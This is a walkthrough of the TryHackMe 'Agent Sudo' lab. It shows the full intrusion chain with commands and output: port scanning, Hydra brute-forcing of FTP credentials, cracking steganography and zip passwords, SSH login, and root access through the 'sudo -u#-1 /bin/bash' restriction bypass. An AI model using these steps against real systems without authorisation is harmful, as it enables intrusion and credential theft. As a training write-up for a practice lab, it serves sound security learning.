Agent Sudo — TryhackMe WriteUp
Hello readers, let’s dive into the depths of cyber intrigue with ‘Agent Sudo,’ a captivating easy rated room on TryHackMe. Imagine yourself as a digital deep-sea explorer, tasked with infiltrating a hidden server shrouded in mystery. Unearth secrets and uncover the truth in this thrilling hacking challenge.
DESCRIPTION: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
Started Nmap scan. There are 3 opens ports
└─$ nmap --min-rate 1000 -p- 10.10.214.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 13:25 EAT
Nmap scan report for 10.10.214.103
Host is up (0.29s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 68.30 secondsNext I ran a service scan.
└─$ nmap -p21,22,80 -A 10.10.214.103
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-17 13:27 EAT
Nmap scan report for 10.10.214.103
Host is up (0.34s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
| 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.34 secondsI start enumerating the services running on each port
FTP (Port 21)
Tried checking for a possibilty for anonymous:anonymous creds but it failed
└─$ ftp 10.10.214.103
Connected to 10.10.214.103.
220 (vsFTPd 3.0.3)
Name (10.10.214.103:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> quit
221 Goodbye.HTTP (Port 80)
I accessed the IP via browser. We find a message in the site.
As user-agent is mentioned I initialize BurpSuite. Because the instruction is Use your own codename as user-agent to access the site. The message came from Agent R so we try changing the user-agent. The image below is by default user-agent.
So I changed it to R for a response, I got a message (What are you doing! Are you one of the 25 employees? If not, I going to report this incident). From that I started I started the value of the user-agent to each of the alphabet letters.
On reaching letter C, I saw a GET request value with a directory /agent_C_attention.php
On accessing it we get a username chris and shows there is another Agent J
I guessed chris was our ftp access so I used Hydra to bruteforce and get the password.
└─$ hydra -l chris -P /usr/share/wordlists/rockyou.txt 10.10.214.103 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-08-17 13:58:32
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ftp://10.10.214.103:21/
[STATUS] 224.00 tries/min, 224 tries in 00:01h, 14344175 to do in 1067:17h, 16 active
[21][ftp] host: 10.10.214.103 login: chris password: (REDACTED)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-08-17 13:59:51I successfully logged in and found the contents(txt file and 2 images) of the ftp server
└─$ ftp 10.10.214.103
Connected to 10.10.214.103.
220 (vsFTPd 3.0.3)
Name (10.10.214.103:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16915|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp>I downloaded all the contents to local machine.
─$ ftp 10.10.214.103
Connected to 10.10.214.103.
220 (vsFTPd 3.0.3)
Name (10.10.214.103:kali): chris
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||16915|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 217 Oct 29 2019 To_agentJ.txt
-rw-r--r-- 1 0 0 33143 Oct 29 2019 cute-alien.jpg
-rw-r--r-- 1 0 0 34842 Oct 29 2019 cutie.png
226 Directory send OK.
ftp> mget To_agentJ.txt cut
cute-alien.jpg cutie.png
ftp> mget To_agentJ.txt cute-alien.jpg cutie.png
mget To_agentJ.txt [anpqy?]? y
229 Entering Extended Passive Mode (|||24166|)
150 Opening BINARY mode data connection for To_agentJ.txt (217 bytes).
100% |***********************************************************************| 217 909.50 KiB/s 00:00 ETA
226 Transfer complete.
217 bytes received in 00:00 (0.71 KiB/s)
mget cute-alien.jpg [anpqy?]? y
229 Entering Extended Passive Mode (|||9683|)
150 Opening BINARY mode data connection for cute-alien.jpg (33143 bytes).
100% |***********************************************************************| 33143 50.16 KiB/s 00:00 ETA
226 Transfer complete.
33143 bytes received in 00:00 (34.10 KiB/s)
mget cutie.png [anpqy?]? y
229 Entering Extended Passive Mode (|||35392|)
150 Opening BINARY mode data connection for cutie.png (34842 bytes).
100% |***********************************************************************| 34842 55.21 KiB/s 00:00 ETA
226 Transfer complete.
34842 bytes received in 00:00 (37.04 KiB/s)
ftp>Started with:-
- To_agentJ.txt
└─$ cat To_agentJ.txt
Dear agent J,
All these alien like photos are fake! Agent R stored the real picture inside your directory. Your login password is somehow stored in the fake picture. It shouldn't be a problem for you.
From,
Agent C- cute-alien.jpg
I used steghide to gather info from the image to find it requires a passphrase
└─$ steghide info cute-alien.jpg
"cute-alien.jpg":
format: jpeg
capacity: 1.8 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
steghide: could not extract any data with that passphrase!I used stegcracker to crack the password and found the password
└─$ stegcracker cute-alien.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.1.0 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2023 - Luke Paris (Paradoxis)
StegCracker has been retired following the release of StegSeek, which
will blast through the rockyou.txt wordlist within 1.9 second as opposed
to StegCracker which takes ~5 hours.
StegSeek can be found at: https://github.com/RickdeJager/stegseek
Counting lines in wordlist..
Attacking file 'cute-alien.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: (REDACTED)
Tried 441075 passwords
Your file has been written to: cute-alien.jpg.out
Area51The steg password is area51
On checking the file written out there is a message to another use Agent J = james
└─$ cat cute-alien.jpg.out
Hi james,
Glad you find this message. Your login password is (REDACTED)
Don't ask me why the password look cheesy, ask agent R who set this password for you.
Your buddy,
chris- cutie.png
I started with binwalk tool to find more about the file. It had hidden contents
└─$ binwalk cutie.png
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 PNG image, 528 x 528, 8-bit colormap, non-interlaced
869 0x365 Zlib compressed data, best compression
34562 0x8702 Zip archive data, encrypted compressed size: 98, uncompressed size: 86, name: To_agentR.txt
34820 0x8804 End of Zip archive, footer length: 22On the extract folder it had a zip file that was encrypted. I used zip2john to hash from the zip then used john to crack it
└─$ ls
365 365.zlib 8702.zip To_agentR.txt└─$ zip2john 8702.zip > hash
┌──(kali㉿kali)-[~/Downloads/THM/AgentSudo/_cutie.png.extracted]
└─$ cat hash
8702.zip/To_agentR.txt:$zip2$*0*1*0*4673cae714579045*67aa*4e*61c4cf3af94e649f827e5964ce575c5f7a239c48fb992c8ea8cbffe51d03755e0ca861a5a3dcbabfa618784b85075f0ef476c6da8261805bd0a4309db38835ad32613e3dc5d7e87c0f91c0b5e64e*4969f382486cb6767ae6*$/zip2$:To_agentR.txt:8702.zip:8702.zipI then used john to crack the hash and found
└─$ john hash
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 ASIMD 4x])
Cost 1 (HMAC size) is 78 for all loaded hashes
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
alien (8702.zip/To_agentR.txt)
1g 0:00:00:02 DONE 2/3 (2023-08-17 14:24) 0.5000g/s 22342p/s 22342c/s 22342C/s 123456..Peter
Use the "--show" option to display all of the cracked passwords reliably
Session completed.We have credentials for james we will use ssh to to access the machine. I found the user.txt file which was our user flag
└─$ ssh james@10.10.214.103
james@10.10.214.103's password:
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-55-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu Aug 17 11:35:40 UTC 2023
System load: 0.0 Processes: 94
Usage of /: 39.7% of 9.78GB Users logged in: 0
Memory usage: 34% IP address for eth0: 10.10.214.103
Swap usage: 0%
75 packages can be updated.
33 updates are security updates.
Last login: Tue Oct 29 14:26:27 2019
james@agent-sudo:~$ ls
Alien_autospy.jpg user_flag.txt
james@agent-sudo:~$ cat user_flag.txt
(REDACTED)There is an image in the same folder with the user flag. To view the image I used SCP tool on my local machine to get the image from the SSH server. So I had to exit the remote machine
└─$ sudo scp james@yourmachineIP:Alien_autospy.jpg /
james@10.10.214.103's password:
Alien_autospy.jpg 100% 41KB 16.0KB/s 00:02
I reverse searched the image using TinyEye
We now needed to escalate our privileges. I try checking what commands james can run as sudo and got
james@agent-sudo:~$ sudo -l
[sudo] password for james:
Matching Defaults entries for james on agent-sudo:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User james may run the following commands on agent-sudo:
(ALL, !root) /bin/bashI tried by checking GTFObins but wasn’t successful so I searched on google for ((ALL, !root) /bin/bash) and found
On running it,
james@agent-sudo:~$ sudo -u#-1 /bin/bash
root@agent-sudo:~# whoami
root
root@agent-sudo:~# ls
Alien_autospy.jpg user_flag.txt
root@agent-sudo:~# cd ~
root@agent-sudo:~# ls
Alien_autospy.jpg user_flag.txt
root@agent-sudo:~# cat /root/root.txt
To Mr.hacker,
Congratulation on rooting this box. This box was designed for TryHackMe. Tips, always update your machine.
Your flag is
(REDACTED)
By,
DesKel a.k.a Agent R
root@agent-sudo:~#About the author
Wilklins Nyatteng is a cyber security enthusiast with interest in penetration testing & vulnerability assessments, OSINT, cloud security. Certified Cyber Security professional by Trend Micro, 9x Microsoft Certified, CEH Master and AWS Solutions Architect — Associate.
Follow me on:
